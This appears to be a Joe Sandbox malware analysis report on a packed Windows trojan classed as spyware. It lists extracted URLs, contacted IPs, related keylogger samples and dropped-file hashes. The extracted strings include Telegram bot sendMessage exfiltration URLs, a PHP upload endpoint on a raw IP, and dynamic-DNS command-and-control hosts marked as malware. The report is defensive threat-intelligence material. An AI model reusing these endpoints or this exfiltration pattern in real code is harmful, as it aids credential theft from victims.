                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.org/botSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.office.com/lBSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000033B5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://checkip.dyndns.orgSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://chrome.google.com/webstore?hl=enSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003388000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003379000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000033BA000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.ecosia.org/newtab/SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://varders.kozow.com:8081SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://aborters.duckdns.org:8081SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          unknown
                          https://ac.ecosia.org/autocomplete?q=SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33$SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.000000000326D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://anotherarmy.dns.army:8081SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://checkip.dyndns.org/qSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://chrome.google.com/webstore?hl=enlBSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003383000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://reallyfreegeoip.orgSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003242000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1379596855.00000000024C2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20aSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://reallyfreegeoip.org/xml/SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003242000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          api.telegram.orgUnited Kingdom
                          62041TELEGRAMRUtrue
                          188.114.97.3
                          reallyfreegeoip.orgEuropean Union
                          13335CLOUDFLARENETUStrue
                          193.122.6.168
                          checkip.dyndns.comUnited States
                          31898ORACLE-BMC-31898USfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1518592
                          Start date and time:2024-09-25 21:53:08 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 34s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@7/6@4/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 79
                          • Number of non-executed functions: 17
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 20.101.57.9
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                          TimeTypeDescription
                          15:54:17API Interceptor11309087x Sleep call for process: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe modified
                          15:54:19API Interceptor12x Sleep call for process: powershell.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                            inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                    Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                          file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              188.114.97.3TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                                              • www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
                                              PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.rtprajalojago.live/2wnz/
                                              (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                                              • dddotx.shop/Mine/PWS/fre.php
                                              QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • filetransfer.io/data-package/DiF66Hbf/download
                                              http://easyantrim.pages.dev/id.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • easyantrim.pages.dev/id.html
                                              QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • filetransfer.io/data-package/13rSMZZi/download
                                              Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                              • www.rtpngk.xyz/yhsl/
                                              PO-001.exeGet hashmaliciousFormBookBrowse
                                              • www.x0x9x8x8x7x6.shop/assb/
                                              PO2024033194.exeGet hashmaliciousFormBookBrowse
                                              • www.cc101.pro/4hfb/
                                              ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
                                              • www.chinaen.org/zi4g/
                                              193.122.6.168Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              rcontractorder.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              rdoc17000320240923070456.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              SKMBT_C22024082310420.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Swftsend8964,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Richiesta di preventivo__DOULIK INDUSTRIES Co (PTE) Ltd___PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              TRANSFERENCIA.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              reallyfreegeoip.orgz95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 188.114.97.3
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.97.3
                                              z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                              • 188.114.96.3
                                              checkip.dyndns.comz95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 193.122.130.0
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.130.0
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.6.168
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 132.226.247.73
                                              z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.130.0
                                              rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                              • 132.226.247.73
                                              api.telegram.orgSecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 149.154.167.220
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                              • 149.154.167.220
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 149.154.167.220
                                              z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ORACLE-BMC-31898USSecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 193.122.130.0
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.130.0
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.130.0
                                              FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                              • 193.122.6.168
                                              rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.6.168
                                              rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 193.122.6.168
                                              rcontractorder.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.6.168
                                              TELEGRAMRUSecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 149.154.167.220
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                              • 149.154.167.220
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 149.154.167.220
                                              z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              CLOUDFLARENETUSz95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 188.114.96.3
                                              https://qrco.de/bfQgn5Get hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              https://1drv.ms/o/c/e6ccafb0b1aa23aa/ErAFgONHz7JMjKMGZiNY1B8BzX_hsp6NES_6N9-YPDqBow?e=ZhzETjGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.24.14
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 188.114.97.3
                                              Cbequipment-Voice Audio Interface.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 104.18.86.42
                                              SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                              • 104.26.13.205
                                              Cbequipment-Voice Audio Interface.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              https://www.baidu.com/link?url=71TX_d4SSy_YcnMiSmK1k9U0hv2RvPANssrmsR9fCmhPc58TVaShxZVuVWaWCInt&wd=YWhvd2V8WlhWeWIzQmhhWFF1Ym1WMHxMalRQY2t0Uk90Get hashmaliciousUnknownBrowse
                                              • 104.18.10.207
                                              SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                              • 162.159.137.232
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              54328bd36c14bd82ddaa0c04b25ed9adz95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 188.114.97.3
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.97.3
                                              z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                              • 188.114.97.3
                                              cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 149.154.167.220
                                              https://1drv.ms/o/c/e6ccafb0b1aa23aa/ErAFgONHz7JMjKMGZiNY1B8BzX_hsp6NES_6N9-YPDqBow?e=ZhzETjGet hashmaliciousHTMLPhisherBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              update.jsGet hashmaliciousNetSupport RATBrowse
                                              • 149.154.167.220
                                              LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                              • 149.154.167.220
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              No context
                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.379552885213346
                                              Encrypted:false
                                              SSDEEP:48:fWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//MM0Uyus:fLHxvCsIfA2KRHmOugA1s
                                              MD5:D453258060AFEB6CAD05A86BCB4BA21D
                                              SHA1:E9E3DC45C2973773AAA422079A5AD945F1C86389
                                              SHA-256:CB241A1BDD284207E8ADD0BB2EEB08DB4B2FF9B86569D7E32FB84A9C9E97D857
